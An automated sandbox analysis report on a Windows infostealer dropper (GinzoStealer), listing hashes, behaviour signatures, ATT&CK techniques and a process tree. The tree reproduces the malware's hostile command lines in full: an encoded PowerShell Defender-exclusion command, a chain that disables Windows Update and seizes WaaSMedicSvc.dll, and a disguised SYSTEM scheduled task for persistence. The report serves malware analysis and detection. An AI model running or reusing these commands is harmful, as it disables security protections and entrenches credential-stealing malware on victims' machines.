59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572

Analysis

max time kernel
150s
max time network
124s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
04-05-2022 12:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe
Size

396KB
MD5

cdf4d67f3c2a779b0e36b0e566d96d5b
SHA1

a9b6050f5f4d5724de611cd5be4064e23751003a
SHA256

59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572
SHA512

774431280b04341b74229afb168653fa922c2240ca79e1830d007de729451d8a2c17695afbd8181a44d2b677edb9fdf9ea543d721506a596817331bce9ca4c0a

Score

10^/10

discovery evasion exploit spyware stealer suricata

Malware Config

Signatures

suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
suricata
Downloads MZ/PE file
Executes dropped EXE 4 IoCs

Processes:

2.exeGinzo.exe881687.exeupdater.exe

pid process

1732 2.exe
3480 Ginzo.exe
220 881687.exe
568 updater.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

608 takeown.exe
1344 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1732	2.exe
3480	Ginzo.exe
220	881687.exe
568	updater.exe

pid	process
608	takeown.exe
1344	icacls.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exeGinzo.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	Ginzo.exe

Loads dropped DLL 7 IoCs

Processes:

Ginzo.exe

pid process

3480 Ginzo.exe
3480 Ginzo.exe
3480 Ginzo.exe
3480 Ginzo.exe
3480 Ginzo.exe
3480 Ginzo.exe
3480 Ginzo.exe
Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

608 takeown.exe
1344 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 freegeoip.app
17 freegeoip.app

pid	process
3480	Ginzo.exe
3480	Ginzo.exe
3480	Ginzo.exe
3480	Ginzo.exe
3480	Ginzo.exe
3480	Ginzo.exe
3480	Ginzo.exe

pid	process
608	takeown.exe
1344	icacls.exe

flow	ioc
16	freegeoip.app
17	freegeoip.app

Suspicious use of SetThreadContext 2 IoCs

Processes:

conhost.exe

description	pid	process	target process
PID 4824 set thread context of 3636	4824	conhost.exe	conhost.exe
PID 4824 set thread context of 3948	4824	conhost.exe	explorer.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Ginzo.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Ginzo.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Ginzo.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

392 schtasks.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.execonhost.exepowershell.execonhost.exe

pid process

4304 powershell.exe
4304 powershell.exe
1404 conhost.exe
2804 powershell.exe
2804 powershell.exe
4824 conhost.exe

pid	process
392	schtasks.exe

pid	process
4304	powershell.exe
4304	powershell.exe
1404	conhost.exe
2804	powershell.exe
2804	powershell.exe
4824	conhost.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

Ginzo.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	3480	Ginzo.exe
Token: SeDebugPrivilege	4304	powershell.exe
Token: SeDebugPrivilege	1404	conhost.exe
Token: SeShutdownPrivilege	556	powercfg.exe
Token: SeCreatePagefilePrivilege	556	powercfg.exe
Token: SeShutdownPrivilege	1392	powercfg.exe
Token: SeCreatePagefilePrivilege	1392	powercfg.exe
Token: SeShutdownPrivilege	1760	powercfg.exe
Token: SeCreatePagefilePrivilege	1760	powercfg.exe
Token: SeShutdownPrivilege	3292	powercfg.exe
Token: SeCreatePagefilePrivilege	3292	powercfg.exe
Token: SeDebugPrivilege	2804	powershell.exe
Token: SeDebugPrivilege	4824	conhost.exe
Token: SeShutdownPrivilege	4000	powercfg.exe
Token: SeCreatePagefilePrivilege	4000	powercfg.exe
Token: SeShutdownPrivilege	2396	powercfg.exe
Token: SeCreatePagefilePrivilege	2396	powercfg.exe
Token: SeShutdownPrivilege	2176	powercfg.exe
Token: SeCreatePagefilePrivilege	2176	powercfg.exe
Token: SeShutdownPrivilege	1360	powercfg.exe
Token: SeCreatePagefilePrivilege	1360	powercfg.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exeGinzo.exe881687.execonhost.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2480 wrote to memory of 1732	2480	59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe	2.exe
PID 2480 wrote to memory of 1732	2480	59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe	2.exe
PID 2480 wrote to memory of 1732	2480	59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe	2.exe
PID 2480 wrote to memory of 3480	2480	59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe	Ginzo.exe
PID 2480 wrote to memory of 3480	2480	59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe	Ginzo.exe
PID 2480 wrote to memory of 3480	2480	59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe	Ginzo.exe
PID 3480 wrote to memory of 220	3480	Ginzo.exe	881687.exe
PID 3480 wrote to memory of 220	3480	Ginzo.exe	881687.exe
PID 220 wrote to memory of 1404	220	881687.exe	conhost.exe
PID 220 wrote to memory of 1404	220	881687.exe	conhost.exe
PID 220 wrote to memory of 1404	220	881687.exe	conhost.exe
PID 1404 wrote to memory of 828	1404	conhost.exe	cmd.exe
PID 1404 wrote to memory of 828	1404	conhost.exe	cmd.exe
PID 828 wrote to memory of 4304	828	cmd.exe	powershell.exe
PID 828 wrote to memory of 4304	828	cmd.exe	powershell.exe
PID 1404 wrote to memory of 2388	1404	conhost.exe	cmd.exe
PID 1404 wrote to memory of 2388	1404	conhost.exe	cmd.exe
PID 1404 wrote to memory of 3956	1404	conhost.exe	cmd.exe
PID 1404 wrote to memory of 3956	1404	conhost.exe	cmd.exe
PID 2388 wrote to memory of 2044	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 2044	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 1048	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 1048	2388	cmd.exe	sc.exe
PID 3956 wrote to memory of 556	3956	cmd.exe	powercfg.exe
PID 3956 wrote to memory of 556	3956	cmd.exe	powercfg.exe
PID 3956 wrote to memory of 1392	3956	cmd.exe	powercfg.exe
PID 3956 wrote to memory of 1392	3956	cmd.exe	powercfg.exe
PID 2388 wrote to memory of 60	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 60	2388	cmd.exe	sc.exe
PID 1404 wrote to memory of 4080	1404	conhost.exe	cmd.exe
PID 1404 wrote to memory of 4080	1404	conhost.exe	cmd.exe
PID 3956 wrote to memory of 1760	3956	cmd.exe	powercfg.exe
PID 3956 wrote to memory of 1760	3956	cmd.exe	powercfg.exe
PID 2388 wrote to memory of 4948	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 4948	2388	cmd.exe	sc.exe
PID 3956 wrote to memory of 3292	3956	cmd.exe	powercfg.exe
PID 3956 wrote to memory of 3292	3956	cmd.exe	powercfg.exe
PID 4080 wrote to memory of 392	4080	cmd.exe	schtasks.exe
PID 4080 wrote to memory of 392	4080	cmd.exe	schtasks.exe
PID 2388 wrote to memory of 1448	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 1448	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 3500	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 3500	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 1572	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 1572	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 4004	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 4004	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 3032	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 3032	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 4132	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 4132	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 1932	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 1932	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 2000	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 2000	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 4360	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 4360	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 4344	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 4344	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 1092	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 1092	2388	cmd.exe	sc.exe
PID 2388 wrote to memory of 608	2388	cmd.exe	takeown.exe
PID 2388 wrote to memory of 608	2388	cmd.exe	takeown.exe
PID 2388 wrote to memory of 1344	2388	cmd.exe	icacls.exe

C:\Users\Admin\AppData\Local\Temp\59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe
"C:\Users\Admin\AppData\Local\Temp\59020b2730a8318ef21a925dc8ab2f6e43dd2f51adfcc3f10d81bb489bc71572.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2480

C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
2⤵
- Executes dropped EXE
PID:1732

C:\Users\Admin\AppData\Local\Temp\Ginzo.exe
"C:\Users\Admin\AppData\Local\Temp\Ginzo.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3480

C:\Users\Admin\AppData\Local\881687.exe
"C:\Users\Admin\AppData\Local\881687.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:220

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\881687.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
5⤵
- Suspicious use of WriteProcessMemory
PID:828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4304

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
5⤵
- Suspicious use of WriteProcessMemory
PID:2388

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
PID:2044

C:\Windows\system32\sc.exe
sc stop bits
6⤵
PID:1048

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
PID:60

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
PID:4948

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
PID:1448

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
6⤵
PID:3500

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
6⤵
PID:1572

C:\Windows\system32\sc.exe
sc config bits start= disabled
6⤵
PID:4004

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
6⤵
PID:3032

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
6⤵
PID:4132

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
6⤵
PID:1932

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
6⤵
PID:2000

C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
6⤵
PID:4360

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
6⤵
PID:4344

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
6⤵
PID:1092

C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:608

C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1344

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
6⤵
PID:2756

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
6⤵
PID:3216

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
PID:4940

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
PID:2112

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
PID:1424

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
6⤵
PID:3588

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
6⤵
PID:5096

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
6⤵
PID:4660

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
6⤵
PID:5040

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
6⤵
PID:3440

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
6⤵
PID:4684

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
6⤵
PID:4692

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:4952

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of WriteProcessMemory
PID:3956

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:556

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1392

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1760

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3292

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:4080

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
6⤵
- Creates scheduled task(s)
PID:392

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
5⤵
PID:1208

C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
6⤵
- Executes dropped EXE
PID:568

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4824

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
8⤵
PID:2092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
8⤵
PID:3028

C:\Windows\system32\sc.exe
sc stop wuauserv
9⤵
PID:456

C:\Windows\system32\sc.exe
sc stop bits
9⤵
PID:1552

C:\Windows\system32\sc.exe
sc stop dosvc
9⤵
PID:2684

C:\Windows\system32\sc.exe
sc stop UsoSvc
9⤵
PID:4568

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
9⤵
PID:1960

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
9⤵
PID:5004

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
9⤵
PID:4532

C:\Windows\system32\sc.exe
sc config bits start= disabled
9⤵
PID:3512

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
9⤵
PID:2232

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
9⤵
PID:2052

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
9⤵
PID:2588

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
9⤵
PID:1536

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
8⤵
PID:4496

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:4000

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:2396

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:2176

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:1360

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
8⤵
PID:3636

C:\Windows\explorer.exe
C:\Windows\explorer.exe clcmeewnjgen0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPBwfs6hsH6BZWYzKcgqh8/w5KES9i8iVGoln9YNKyIMIhchOv/qhVSSEyQVeeilGRs3EMCL7VVGCZZSNmGX+WhFkG6w6YtPhSONt0KQQX8lWBvZt8FTQet3u0ld4bcUsTw5fhWYnAMLoF2LOPPGYB2TrjMWdV62jpwHJofDnqBDBuWFMcEnGAyC28ts80L6HbzDjD0sBquAT4Mewl/rkK/eevnCIDRRDM/KANXpzBDbtzl320IoXjIb++yELBFh84SFIEF7L1qVd4YMHKeZwe807fKfwUBxVnRO7THuzKbYajHeg/I3SfaR6UzIZjCjwxfhgN5uZ2YUVYF2II6O4qeOY3s8Ab9cm7XC77uCy/Na4z1O1SfjGZbw/cD9kQ+XXgNvtDG6BognpyTqDH6/Yd56nhRN7gcoUiQQ2GwpUmVPUtKsvTrf3487LBbzei+Xrzzg==
8⤵
PID:3948

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

